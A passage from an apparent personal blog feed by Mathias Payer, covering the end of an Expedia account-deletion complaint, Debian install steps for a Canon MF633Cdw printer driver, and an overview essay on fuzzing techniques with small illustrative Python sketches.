resend that email.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-26-expedia-ch-june-18"&gt;
&lt;h2&gt;Act 26: Expedia.ch: June 18&lt;/h2&gt;
&lt;p&gt;A day after the end of the first reservation, and on the day the second
reservation started, I received a note from Expedia Germany asking about my
rewards balance and resending me the two reservations. This seems a little late
considering that the first reservation is already over and we have checked into
the second hotel. It's also odd that they ask me about the points balance of my
previous rewards account.&lt;/p&gt;
&lt;p&gt;The service agent mentioned that she'll look into a compensation for my
experience. I'll be waiting for more news.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-27-expedia-com-june-20"&gt;
&lt;h2&gt;Act 27: Expedia.com: June 20&lt;/h2&gt;
&lt;p&gt;Without any note or change from my end, I can no longer log into Expedia.com
using my newly created account (from June 11). Expedia must have deleted this
newly created account again as part of their analysis process. This is becoming
more than ridiculous. Let me repeat: Expedia, after being unable to
reinstantiate my deactivated account, asked me to create a new account and now
also deleted this new account. The error message I get is the same as when they
initially deleted the first account.&lt;/p&gt;
&lt;p&gt;At least, I no longer get the spam messages about different amazing offers I
could get.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-28-expedia-ch-june-23"&gt;
&lt;h2&gt;Act 28: Expedia.ch: June 23&lt;/h2&gt;
&lt;p&gt;As my account has been deleted again and I did not receive any notification in
another week -- despite promises from both .com and .ch support to contact me --
I've sent another reminder to Expedia.ch, inquiring why my newly created account
from early June has been deleted again.&lt;/p&gt;
&lt;p&gt;I honestly don't know what these guys are doing and how they stay in business.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-29-expedia-ch-june-29"&gt;
&lt;h2&gt;Act 29: Expedia.ch: June 29&lt;/h2&gt;
&lt;p&gt;After another couple of days of waiting (and giving up with Expedia), I
received another email from Expedia priority support. The agent confirmed
that my second account was 'accidentally' deleted as well, encouraged
me to open another account, and confirmed that a) this new account will
not be deleted again (lol), b) they will reassign me the open points
from my previous account, and c) they will offer me 75 EUR for my
difficulties.&lt;/p&gt;
&lt;p&gt;Looking at the massive amount of time I have invested into their broken system,
this results in an amazing hourly pay of about 5 EUR. Thanks Expedia!&lt;/p&gt;
&lt;p&gt;I responded and am waiting for them to actually follow up. Let's see if they
also reinstantiate my 'Gold' status.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-30-expedia-com-ch-july-1"&gt;
&lt;h2&gt;Act 30: Expedia.com/ch: July 1&lt;/h2&gt;
&lt;p&gt;Almost two months after I started this unhappy journey, we have reached a
conclusion and my open tickets have been closed. I
received an email from Expedia Switzerland that they will gift me 75 EUR and
return my points. Just a little later I received an email from Expedia.com
customer support that my account had been successfully reactivated [sic].&lt;/p&gt;
&lt;p&gt;When I logged in I saw that I received a coupon for 75$ (not Euros but close
enough I guess) and roughly 3000 points, which corresponds to roughly 600 in
spending. Unfortunately, I know that I've spent at least 400+620+170+240+600
on hotels in that timeframe that have not been credited, which should be
10150 points give or take.&lt;/p&gt;
&lt;p&gt;Additionally, they did not reinstantiate the 'Gold' tier for what it's worth
and I'm now a lowly 'Blue' tier.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="final-act"&gt;
&lt;h2&gt;Final act&lt;/h2&gt;
&lt;p&gt;My plan is now to spend the money/points I received on my next booking and
then never to use Expedia again. Maybe I'll even try to delete my account
again for some extra fun!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Random"></category><category term="Travel Expedia"></category></entry><entry><title>How to install a Canon MF633Cdw on a modern Debian</title><link href="/blog/2019/0610-MF633Cdw.html" rel="alternate"></link><published>2019-06-10T16:03:00-04:00</published><updated>2019-06-10T16:03:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2019-06-10:/blog/2019/0610-MF633Cdw.html</id><summary type="html">&lt;p&gt;Installing printers can be a pain. Installing printers on Linux results in an
even bigger pain. Installing printers with wrong and crappy drivers and no
open-source alternative is an endless amount of pain.&lt;/p&gt;
&lt;p&gt;Kudos to Canon for hitting the trifecta.&lt;/p&gt;
&lt;p&gt;So I've set out to get the drivers for my …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Installing printers can be a pain. Installing printers on Linux results in an
even bigger pain. Installing printers with wrong and crappy drivers and no
open-source alternative is an endless amount of pain.&lt;/p&gt;
&lt;p&gt;Kudos to Canon for hitting the trifecta.&lt;/p&gt;
&lt;p&gt;So I've set out to get the drivers for my Canon MF633Cdw to work over the
network. I've set up CUPS and everything else as it's supposed to be but I could
not select the correct driver.&lt;/p&gt;
&lt;p&gt;I therefore resorted to the &lt;a class="reference external" href="https://www.canon-europe.com/support/consumer_products/products/fax__multifunctionals/laser/laserbase_mf_series/i-sensys_mf633cdw.aspx?type=drivers&amp;amp;language=EN&amp;amp;os=LINUX"&gt;Canon driver page&lt;/a&gt;
and downloaded the Linux drivers. The tar archive comes with drivers for 32-bit
and 64-bit. I obviously and naively installed the 64-bit drivers.&lt;/p&gt;
&lt;p&gt;As it turns out, the Canon 64-bit drivers have dependencies on 32-bit code and
32-bit programs. To get the driver to work, you need to:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
$ tar xvzf linux-UFRII-drv-v360-uken-02.tar.gz
$ cd linux-UFRII-drv-v360-uken
$ cd 64-bit-Driver/Debian
$ sudo dpkg -i *.deb
$ sudo apt -f install
$ cd ../../32-bit-Driver/Debian
$ sudo dpkg --add-architecture i386
$ sudo dpkg -i *.deb
$ sudo apt -f install
$ cd ../../64-bit-Driver/Debian
$ sudo dpkg -i *.deb
$ cd ../../PPD/Debian
$ sudo dpkg -i *.deb
$ sudo service cups restart
&lt;/pre&gt;
&lt;p&gt;Then you can add your fancy printer via the printer dialog. Now just make sure
not to uninstall the i386 packages that apt thinks are no longer needed, because
they are. Thanks to crappy drivers with 32-bit dependencies.&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
$ sudo apt-mark manual libatk1.0-0:i386 libavahi-client3:i386 \
  libavahi-common-data:i386 libavahi-common3:i386 libbsd0:i386 \
  libcairo2:i386 libcups2:i386 libdatrie1:i386 libdbus-1-3:i386 \
  libexpat1:i386 libffi6:i386 libfontconfig1:i386 libfreetype6:i386 \
  libgail-common:i386 libgail18:i386 libgcrypt20:i386 \
  libgdk-pixbuf2.0-0:i386 libglade2-0:i386 libglib2.0-0:i386 libgmp10:i386 \
  libgnutls30:i386 libgpg-error0:i386 libgraphite2-3:i386 \
  libgssapi-krb5-2:i386 libgtk2.0-0:i386 libharfbuzz0b:i386 \
  libhogweed4:i386 libicu57:i386 libidn11:i386 libjbig0:i386 \
  libjpeg62-turbo:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 \
  libkrb5support0:i386 liblz4-1:i386 libnettle6:i386 libp11-kit0:i386 \
  libpango-1.0-0:i386 libpangocairo-1.0-0:i386 libpangoft2-1.0-0:i386 \
  libpixman-1-0:i386 libpng16-16:i386 libstdc++6:i386 libsystemd0:i386 \
  libtasn1-6:i386 libthai0:i386 libtiff5:i386 libx11-6:i386 libxau6:i386 \
  libxcb-render0:i386 libxcb-shm0:i386 libxcb1:i386 libxcomposite1:i386 \
  libxcursor1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6:i386 \
  libxfixes3:i386 libxi6:i386 libxinerama1:i386 libxml2:i386 \
  libxrandr2:i386 libxrender1:i386
&lt;/pre&gt;
</content><category term="Random"></category><category term="Linux Printing"></category></entry><entry><title>The Fuzzing Hype-Train: How Random Testing Triggers Thousands of Crashes</title><link href="/blog/2019/0401-FuzzTrain.html" rel="alternate"></link><published>2019-04-01T10:25:00-04:00</published><updated>2019-04-01T10:25:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2019-04-01:/blog/2019/0401-FuzzTrain.html</id><summary type="html">&lt;p&gt;Software contains bugs and some bugs are exploitable. Mitigations protect our systems in the presence of these vulnerabilities, often stopping the program when detecting a security violation. The alternative is to discover bugs during development and fixing them in the code. Despite massive efforts, finding and reproducing bugs is incredibly …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Software contains bugs and some bugs are exploitable. Mitigations protect our systems in the presence of these vulnerabilities, often stopping the program when detecting a security violation. The alternative is to discover bugs during development and fixing them in the code. Despite massive efforts, finding and reproducing bugs is incredibly hard. Fuzzing is an efficient way of discovering security critical bugs by triggering exceptions such as crashes, memory corruption, or assertion failures automatically (or with a little help) and comes with a witness (proof of the vulnerability) that allows developers to reproduce the bug and fix it.&lt;/p&gt;
&lt;p&gt;Software testing broadly focuses on discovering and patching bugs during development. Unfortunately, a program is only secure if it is free of unwanted exceptions and therefore requires proving the absence of security violations. For example, a bug becomes a vulnerability if any attacker-controlled input reaches a program location that allows a security violation such as memory corruption. Software security testing therefore requires reasoning about all possible executions of code at once to produce a witness that violates the security property. As Edsger W. Dijkstra said in 1970: "Program testing can be used to show the presence of bugs, but never to show their absence!"&lt;/p&gt;
&lt;p&gt;System software such as browsers, runtime systems, or kernels are written in low level languages (such as C and C++) that are prone to exploitable, low level defects. Undefined behavior is at the root of low level vulnerabilities, e.g., invalid pointer dereferences resulting in memory corruption, casting to an incompatible type leading to type confusion, integer overflows, or API confusion. To cope with the complexity of current programs, companies like Google, Microsoft, or Apple integrate dynamic software testing into their software development cycle to find bugs.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Fuzzing" src="/blog/static/2019/0401/fuzzing.png"&gt;&lt;/p&gt;
&lt;p&gt;Figure 1: Fuzzing consists of an execution engine and an input generation process to run executables (which are often instrumented with explicit memory safety checks). The input generation mechanism may leverage existing test cases and execution coverage to generate new test inputs. For each discovered crash, the fuzzer provides a witness (input that triggers the crash).&lt;/p&gt;
&lt;p&gt;Fuzzing, the process of providing random input to a program to trigger unintended crashes, has been around since the early 1980s. Recently, we are seeing a revival of fuzzing techniques with several papers improving effectiveness at each top tier security conference. The idea of fuzzing is incredibly simple: execute a program in a test environment with random input and detect if it crashes. The fuzzing process is inherently sound but incomplete. By producing test cases and observing if the program under test crashes, fuzzing produces a witness for each discovered crash. As a dynamic testing technique, fuzzing is incomplete: for non-trivial programs, it will neither cover all possible program paths nor all data-flow paths unless run for an infinite amount of time. Fuzzing strategies are inherently an optimization problem where the available resources are used to discover as many bugs as possible, covering as much of the program functionality as possible through a probabilistic exploration process. Due to its nature as a dynamic testing technique, fuzzing faces several unique challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Input generation&lt;/em&gt;: fuzzers generate inputs based on a mutation strategy to explore new state. Being aware of the program structure allows the fuzzer to tailor input generation to the program. The underlying strategy determines how effectively the fuzzer explores a given state space. A challenge for input generation is the balance between exploring new paths (control flow) and executing the same paths with different input (data flow).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Execution engine&lt;/em&gt;: the execution engine takes newly generated input and executes the program under test with that input to detect flaws. Fuzzers must distinguish between benign and buggy executions. Not every bug results in an immediate segmentation fault and detecting state violations is a challenging task, especially as code generally does not come with a formal model. Additionally, the fuzzer must disambiguate crashes to uniquely identify bugs without missing true positives.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Coverage wall&lt;/em&gt;: fuzzing struggles with some aspects of code such as fuzzing a complex API, checksums in file formats, or hard comparisons such as a password check. Preparing the fuzzing environment is a crucial step to increase the efficiency of fuzzing.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Evaluating fuzzing effectiveness&lt;/em&gt;: defining metrics to evaluate the effectiveness for a fuzzing campaign is challenging. For most programs the state space is (close to) infinite and fuzzing is a brute force search in this state space. Deciding when to, e.g., move to another target, path, or input is a crucial aspect of fuzzing. Orthogonally, comparing different fuzzing techniques requires understanding of the strengths of a fuzzer and the underlying statistics to enable fair comparison.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Input generation&lt;/h2&gt;
&lt;p&gt;Input generation is essential to the fuzzing process as every fuzzer must automatically generate test cases to be run on the execution engine. The cost for generating a single input must be low, following the underlying philosophy of fuzzing where iterations are cheap. Through input generation, the fuzzer implicitly selects which parts of the program under test are executed. Input generation must balance data-flow and control-flow exploration (discovering new code areas compared to revisiting previously executed code areas with alternate data) while considering what areas to focus on. There are two fundamental forms of input generation: model-based input generation and mutation-based input generation. The first is aware of the input format while the latter is not.&lt;/p&gt;
&lt;p&gt;Knowledge of the input structure given through a grammar enables model-based input generation to produce (mostly) valid test cases. The grammar specifies the input format and implicitly the explorable state space. Based on the grammar, the fuzzer can produce valid test cases that satisfy many checks in the program such as valid state checks, dependencies between fields, or checksums such as a CRC32. For example, without an input model the majority of randomly generated test cases will fail the equality check for a correct checksum and quickly error out without triggering any complex behavior. The model allows input generation to balance the generated test inputs according to the underlying input protocol. The disadvantage of model-based input generation is the need for an actual model. Most input formats are not formally described and will require an analyst to define the intricate dependencies.&lt;/p&gt;
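&lt;p&gt;As a toy illustration of model-based generation, the sketch below expands a tiny hand-written grammar (an assumption for this example, not any real input format) into syntactically valid arithmetic expressions:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
```python
import random

# A toy grammar: each nonterminal maps to a list of expansions;
# the strings in each tuple are concatenated after expansion.
GRAMMAR = {
    "expr": [("num",), ("expr", "op", "expr")],
    "op": [("+",), ("-",), ("*",)],
    "num": [(str(n),) for n in range(10)],
}

def generate(symbol="expr", depth=0):
    """Expand a nonterminal into a concrete string, bounding recursion."""
    if symbol not in GRAMMAR:
        return symbol                  # terminal: emit as-is
    options = GRAMMAR[symbol]
    if depth == 4:
        options = options[:1]          # first rule is non-recursive: terminate
    expansion = random.choice(options)
    return "".join(generate(s, depth + 1) for s in expansion)

random.seed(1)
sample = generate()
```
&lt;/pre&gt;
&lt;p&gt;Every generated input is valid by construction, so the fuzzing budget is spent behind the parser rather than on syntax errors.&lt;/p&gt;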
&lt;p&gt;Mutation-based input generation requires a set of seed inputs that trigger valid functionality in the program and then leverages random mutation to modify these seeds. Providing a set of valid inputs is significantly easier than formally specifying an input format. The input mutation process then constantly modifies these input seeds to trigger interesting behavior.&lt;/p&gt;
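&lt;p&gt;A minimal mutation stage might look as follows; the three operators are a tiny, hypothetical subset of the havoc-style mutations fuzzers such as AFL apply:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
```python
import random

def mutate(seed):
    """Apply one random havoc-style mutation to a seed input."""
    data = bytearray(seed)
    choice = random.randrange(3)
    if choice == 0:
        # flip one random bit of a random byte
        data[random.randrange(len(data))] ^= 2 ** random.randrange(8)
    elif choice == 1:
        # overwrite a random byte with a random value
        data[random.randrange(len(data))] = random.randrange(256)
    else:
        # duplicate the tail starting at a random position
        i = random.randrange(len(data))
        data[i:i] = data[i:]
    return bytes(data)

random.seed(7)
mutated = mutate(b"GET /index.html")
```
&lt;/pre&gt;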
&lt;p&gt;Regardless of the input mutation strategy, fuzzers need a fitness function to assess the quality of the new input, and guide the generation of new input. A fuzzer may leverage the program structure and code coverage as fitness functions. There are three different approaches to observing the program during fuzzing to provide input to the fitness function. Whitebox fuzzing infers the program specification through program analysis, but often results in untenable cost. For example, the SAGE whitebox fuzzer leverages symbolic execution to explore different program paths. Blackbox fuzzing blindly generates new input without reflection. The lack of a fitness function limits blackbox fuzzing to functionality close to the provided test cases. Greybox fuzzing leverages light-weight program instrumentation instead of heavier-weight program analysis to infer coverage during the fuzzing campaign itself, merging analysis and testing.&lt;/p&gt;
&lt;p&gt;Coverage-guided greybox fuzzing combines mutation-based input generation with program instrumentation to detect whenever a mutated input reaches new coverage. Program instrumentation tracks which areas of the code are executed and the coverage profile is tied to specific inputs. Whenever an input mutation generates new coverage, the mutated input is added to the set of inputs for mutation. This approach is incredibly efficient due to the low-cost instrumentation but still results in broad program coverage. Coverage-guided fuzzing is the current de-facto standard, with AFL [Zal13] and honggfuzz [Swi10] as the most prominent implementations. These fuzzers leverage execution feedback to tailor input generation without requiring deep insight into the program structure by the analyst.&lt;/p&gt;
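&lt;p&gt;The feedback loop itself fits in a few lines. The sketch below is illustrative only: coverage is modeled as a set of block ids returned by a toy target, the mutator is a single byte overwrite, and whether the planted bug is reached within the iteration budget is down to chance:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
```python
import random

def flip(data):
    """Overwrite one random byte (stand-in for richer mutation operators)."""
    out = bytearray(data)
    out[random.randrange(len(out))] = random.randrange(256)
    return bytes(out)

def toy_target(data):
    """Toy program under test: returns covered block ids, raises on b'FU'."""
    cov = {0}
    if data[:1] == b"F":
        cov.add(1)
        if data[1:2] == b"U":
            raise RuntimeError("bug reached")
    return cov

def coverage_guided_fuzz(target, seeds, iterations=5000):
    """Keep every mutated input that reaches coverage not seen before."""
    corpus = list(seeds)
    seen = set()                      # union of all coverage ids so far
    crashes = []                      # witnesses, one input per crash
    for _ in range(iterations):
        child = flip(random.choice(corpus))
        try:
            cov = target(child)
        except Exception:
            crashes.append(child)     # store the reproducing input
            continue
        if not cov.issubset(seen):    # new block reached: promote input
            seen.update(cov)
            corpus.append(child)
    return corpus, crashes, seen

random.seed(3)
corpus, crashes, seen = coverage_guided_fuzz(toy_target, [b"AAAA"])
```
&lt;/pre&gt;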
&lt;p&gt;A difficulty for input generation is the optimization between discovering new paths and evaluating existing paths with different data. While the first increases coverage and explores new program areas, the latter explores already covered code through different data-flow. Existing metrics have a heavy control-flow focus as coverage measures how much of the program has already been explored. Data-flow coverage is only measured implicitly with inputs that execute the same paths but with different data values. A good input generation mechanism balances the explicit goal of extending coverage with the implicit goal of rerunning the same input paths with different data.&lt;/p&gt;
&lt;h2&gt;Execution engine&lt;/h2&gt;
&lt;p&gt;After the fuzzer generates test cases, it must execute them in a controlled environment and detect when a bug is triggered. The execution engine takes the fuzz input, executes the program under test, extracts runtime information such as coverage, and detects crashes. Ideally a program would terminate whenever a flaw is triggered. For example, an illegal pointer dereference on an unmapped memory page results in a segmentation fault which terminates the program, allowing the execution engine to detect the flaw. Unfortunately, only a small subset of security violations will result in program crashes. Buffer overflows into adjacent memory locations, for example, may only be detected later if the overwritten data is used or may never be detected at all. The challenge for this component of the fuzzing process is to efficiently enable the detection of security violations. For example, without instrumentation, only illegal pointer dereferences to unmapped memory, control-flow transfers to non-executable memory, division by zero, or similar faults will trigger an exception.&lt;/p&gt;
&lt;p&gt;To detect security violations early, the program under test may be instrumented with additional software guards. Security violations through undefined behavior for code written in systems languages are particularly tricky. Sanitization analyzes and instruments the program during the compilation process to detect security violations. Address Sanitizer (ASan) [SBP+12], the most commonly used sanitizer, probabilistically detects spatial and temporal memory safety violations by placing red-zones around allocated memory objects, keeping track of allocated memory, and carefully checking memory accesses. Other LLVM-based sanitizers cover undefined behavior (UBSan), uninitialized memory (MSan), or type safety violations through illegal casts [JBC+17]. Each sanitizer requires certain instrumentation that increases the performance cost. The usability of sanitizers for fuzzing therefore has to be carefully evaluated as, on one hand, it makes error detection more likely but, on the other hand, reduces fuzzing throughput.&lt;/p&gt;
&lt;p&gt;The main goal of the execution engine is to execute as many inputs per second as possible. Several fuzzing optimizations such as fork servers, persistent fuzzing, or special OS primitives reduce the time for each execution by adjusting system parameters. Fuzzing with a fork server executes the program up to a certain point and then forks new processes at that location for each new input. This allows the execution engine to skip over initialization code that would be the same for each execution. Persistent fuzzing allows the execution engine to reuse processes in a pool with new fuzzing input, resetting state between executions. Different OS primitives for fuzzing reduce the cost of process creation by, e.g., simplifying page table creation and optimizing scheduling for short lived processes.&lt;/p&gt;
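&lt;p&gt;A fork server can be approximated in a few lines of POSIX-only Python. This is a toy model of the idea, not AFL's actual protocol: one-time setup happens in the parent, each test case runs in a freshly forked child, and the exit status classifies the run:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
```python
import os

def run_with_fork_server(execute, inputs):
    """Fork per test case after one-time setup, collecting exit codes.

    Exit code 0 models a clean run, 1 a detected crash. Real fuzzers
    additionally talk to the forked target over pipes.
    """
    results = []
    for data in inputs:
        pid = os.fork()
        if pid == 0:
            # Child: execute the test case and exit without returning.
            try:
                execute(data)
                os._exit(0)
            except Exception:
                os._exit(1)           # crash signal to the parent
        _, status = os.waitpid(pid, 0)
        results.append(os.WEXITSTATUS(status))
    return results

def program_under_test(data):
    """Hypothetical target that crashes on one specific input."""
    if data == b"crash":
        raise ValueError("simulated memory-safety violation")

codes = run_with_fork_server(program_under_test, [b"ok", b"crash", b"ok"])
```
&lt;/pre&gt;
&lt;p&gt;The payoff in a real fuzzer is that expensive initialization runs once and each forked child starts from that already-initialized state.&lt;/p&gt;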
&lt;p&gt;Modern fuzzing is heavily optimized and focuses on efficiency, measured by the number of bugs found per time. Sometimes, fuzzing efficiency is measured implicitly by the number of crashes found per time, but crashes are not unique: many crashes can point to the same bug. Disambiguating crashes to locate unique bugs is an important but challenging task. Multiple bugs may cause a program crash at the same location whereas one input may trigger multiple bugs. A fuzzer must triage crashes conservatively so that no true bugs are removed, but the triaging must also be effective so as not to overload the analyst with redundant crashes.&lt;/p&gt;
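&lt;p&gt;A common first step for triaging is stack-hash bucketing: crashing inputs whose top stack frames agree are grouped into one bucket. The sketch below illustrates the idea (the frame lists are hypothetical placeholders for parsed backtraces); as argued above, such heuristics remain approximate and ground truth is still needed to actually count bugs:&lt;/p&gt;

```python
import hashlib

def bucket_crashes(crash_reports, top_n=3):
    """Group crashing inputs by a hash over their top `top_n` stack
    frames. Conservative in the sense that no crash is dropped, but
    distinct bugs sharing a crash location still collide into one
    bucket, and one bug can spread over several buckets."""
    buckets = {}
    for input_id, frames in crash_reports:
        key = hashlib.sha1("|".join(frames[:top_n]).encode()).hexdigest()[:12]
        buckets.setdefault(key, []).append(input_id)
    return buckets
```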
&lt;h2&gt;Coverage wall&lt;/h2&gt;
&lt;p&gt;The key advantage of fuzzing compared to more heavyweight analysis techniques is its incredible simplicity (and massive parallelism). Due to this simplicity, fuzzing can get stuck in local minima where continuous input generation will not result in additional crashes or new coverage -- the fuzzer is stuck in front of a coverage wall. A common approach to circumvent the coverage wall is to extract seed values used for comparisons. These seed values are then used during the input generation process. Orthogonally, a developer can comment out hard checks such as CRC32 comparisons or checks for magic values. Removing these non-critical checks from the program requires a knowledgeable developer who custom-tailors fuzzing for each program.&lt;/p&gt;
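&lt;p&gt;The check-removal trick looks roughly as follows (illustrative Python; the &lt;code&gt;FUZZ_BUILD&lt;/code&gt; flag and &lt;code&gt;process&lt;/code&gt; function are hypothetical, standing in for a developer's build-time switch and the parsing code behind the check):&lt;/p&gt;

```python
import zlib

FUZZ_BUILD = True  # hypothetical build flag, standing in for a #ifdef

def process(body):
    """Placeholder for the parsing logic we actually want to fuzz."""
    return len(body)

def parse_packet(data):
    """A CRC32 comparison is a wall a mutational fuzzer essentially never
    passes by chance; a fuzzing build skips it so mutated inputs can
    reach the code behind the check."""
    body, checksum = data[:-4], data[-4:]
    if not FUZZ_BUILD and zlib.crc32(body) != int.from_bytes(checksum, "little"):
        raise ValueError("bad checksum")  # mutated inputs would die here
    return process(body)
```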
&lt;p&gt;Several recent extensions [SGS+16, RJK+17, PSP18, ISM+18] try to bypass the coverage wall by automatically detecting when the fuzzer gets stuck and then leveraging an auxiliary analysis to either produce new inputs or to modify the program. It is essential that this (sometimes heavyweight) analysis is only executed infrequently as alternating between analysis and fuzzing is costly and reduces fuzzing throughput.&lt;/p&gt;
&lt;p&gt;Fuzzing libraries poses an additional challenge: coverage remains low during unguided fuzzing campaigns. Programs often call exported library functions in sequence, building up complex state in the process. The library functions execute sanity checks and quickly detect illegal or missing state. These checks make library fuzzing challenging as the fuzzer is not aware of the dependencies between library functions. Existing approaches such as LibFuzzer require an analyst to prepare a test program that calls the library functions in a valid sequence to build up the necessary state to fuzz complex functions.&lt;/p&gt;
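&lt;p&gt;A LibFuzzer-style harness encodes the valid call sequence by hand so that fuzzer-controlled bytes reach the deep parsing code instead of dying in the library's sanity checks. The sketch below uses a hypothetical stateful &lt;code&gt;Parser&lt;/code&gt; API for illustration:&lt;/p&gt;

```python
class Parser:
    """Toy stand-in for a stateful library: feed() refuses to run unless
    the earlier setup calls have built up the state it expects."""
    def __init__(self):
        self.limit = None
        self.closed = False
    def set_limit(self, n):
        self.limit = n
    def feed(self, data):
        if self.limit is None or self.closed:
            raise RuntimeError("API misuse: parser not configured")
        if len(data) > self.limit:
            raise ValueError("input too large")  # expected rejection
        return data.decode("latin-1")            # the code we want to reach
    def close(self):
        self.closed = True

def harness(data: bytes):
    """Harness sketch: the analyst hard-codes the valid call sequence so
    that the fuzzer-controlled bytes reach the interesting code."""
    p = Parser()
    p.set_limit(4096)       # build up the state that feed() checks for
    try:
        p.feed(data)        # only now is the complex parsing reachable
    except ValueError:
        pass                # expected rejection of bad input, not a bug
    finally:
        p.close()           # tear down so the next iteration starts clean
```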
&lt;h2&gt;Evaluating fuzzing&lt;/h2&gt;
&lt;p&gt;In theory, evaluating fuzzing is straightforward: in a given domain, if technique A finds more unique bugs than technique B, then technique A is superior to technique B. In practice, evaluating fuzzing is incredibly hard due to the randomness of the process and domain specialization (e.g., a fuzzer may only work for certain types of bugs or in a certain environment). Rerunning the same experiment with a different random seed may result in a vastly different number of crashes, discovered bugs, and iterations. A recent study [KRC+18] evaluated the common practices of recently published fuzzing techniques (and therefore also serves as an overview of the current state of the art, going beyond this article). The study identified common benchmarking crimes when comparing different fuzzers and condensed its findings into four observations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Multiple executions&lt;/em&gt;: A single execution is not enough due to the randomness in the fuzzing process. Input mutation relies on randomness to decide (according to the mutation strategy) where to mutate input and what to mutate. In a single run, one mechanism could discover more bugs simply because it is “lucky”. To evaluate different mechanisms, we require multiple trials and statistical tests to measure noise.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Crash triaging&lt;/em&gt;: Heuristics cannot be used as the only way to measure performance. For example, collecting crashing inputs or even stack bucketing does not uniquely identify bugs. Ground truth is needed to disambiguate crashing inputs and to correctly count the number of discovered bugs. A benchmark suite with ground truth will help.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Seed justification&lt;/em&gt;: The choice of seed must be documented as different starting seeds provide vastly different starting configurations and not all techniques cope with different seed characteristics equally well. Some mechanisms require a head start with seeds to execute reasonable functionality while others are perfectly fine to start with empty inputs.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Reasonable execution time&lt;/em&gt;: Fuzzing campaigns are generally executed for multiple days to weeks. Comparing different mechanisms based on a few hours of execution time is not enough. A realistic evaluation therefore must run fuzzing campaigns at least for 24 hours.&lt;/li&gt;
&lt;/ul&gt;
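&lt;p&gt;As one concrete ingredient of such an evaluation, an effect-size measure over per-trial results quantifies how consistently one technique beats another across the required multiple runs. The sketch below implements the Vargha-Delaney A12 statistic (a common choice in evaluations of randomized algorithms; pairing it with a statistical test such as Mann-Whitney U is the usual practice):&lt;/p&gt;

```python
def a12(xs, ys):
    """Vargha-Delaney A12 effect size over per-trial results (e.g., bugs
    found per 24h trial): the probability that a randomly chosen trial
    of technique A beats a randomly chosen trial of technique B. 0.5
    means no difference; values near 1.0 mean A wins consistently across
    trials rather than in one lucky run."""
    gt = sum(1 for x in xs for y in ys if x > y)
    eq = sum(1 for x in xs for y in ys if x == y)
    return (gt + 0.5 * eq) / (len(xs) * len(ys))
```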
&lt;p&gt;These recommendations make fuzzing evaluation more complex. Evaluating each mechanism now takes a considerable amount of time, with experiments running for multiple days to get enough statistical data for a fair and valid comparison. Unfortunately, such a thorough evaluation is required as it enables a true comparison and a discussion of factors that enable better fuzzing results.&lt;/p&gt;
&lt;h2&gt;A call for future work&lt;/h2&gt;
&lt;p&gt;With the advent of coverage-guided greybox fuzzing [Zal13, Swi10], dynamic testing has seen a renaissance with many new techniques that improve security testing. While fuzzing is incomplete, its advantage is that each reported bug comes with a witness that allows the deterministic reproduction of the bug. Sanitization, the process of instrumenting code with additional software guards, helps to discover bugs closer to their source. Overall, security testing remains challenging, especially for libraries or complex code such as kernels or large software systems. As fuzzers become more domain specific, an interesting challenge will be the comparison across different domains (e.g., comparing a grey-box kernel fuzzer for use-after-free vulnerabilities with a black-box protocol fuzzer is hard). Given the massive recent improvements of fuzzing, there will be exciting new results in the future. Fuzzing will help make our systems more secure by finding bugs during the development of code before they can cause any harm during deployment.&lt;/p&gt;
&lt;p&gt;Fuzzing currently is an extremely hot research area in software security with several new techniques being presented at each top tier security conference. The research directions can be grouped into improving input generation, reducing the performance impact for each execution, better detection of security violations, or pushing fuzzing to new domains such as kernel fuzzing or hardware fuzzing. All these areas are exciting new dimensions and it will be interesting to see how fuzzing can be improved further.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;p&gt;[Zal13] Michał Zalewski. American Fuzzy Lop (AFL).
http://lcamtuf.coredump.cx/afl/technical_details.txt, 2013.&lt;/p&gt;
&lt;p&gt;[Swi10] Robert Swiecki. Honggfuzz.
https://github.com/google/honggfuzz/, 2010.&lt;/p&gt;
&lt;p&gt;[SBP+12] Konstantin Serebryany and Derek Bruening and Alexander Potapenko and
Dmitry Vyukov. AddressSanitizer: A Fast Address Sanity Checker. In Usenix ATC 2012.&lt;/p&gt;
&lt;p&gt;[JBC+17] Yuseok Jeon and Priyam Biswas and Scott A. Carr and Byoungyoung Lee and Mathias Payer. HexType: Efficient Detection of Type Confusion Errors for C++. In ACM CCS 2017.&lt;/p&gt;
&lt;p&gt;[SGS+16] Nick Stephens and John Grosen and Christopher Salls and Andrew Dutcher and Ruoyu Wang and Jacopo Corbetta and Yan Shoshitaishvili and Christopher Kruegel and Giovanni Vigna. Driller: Augmenting Fuzzing Through Selective Symbolic Execution. In ISOC NDSS 2016.&lt;/p&gt;
&lt;p&gt;[RJK+17] Sanjay Rawat and Vivek Jain and Ashish Kumar and Lucian Cojocar and Cristiano Giuffrida and Herbert Bos. VUzzer: Application-aware evolutionary fuzzing. In ISOC NDSS 2017.&lt;/p&gt;
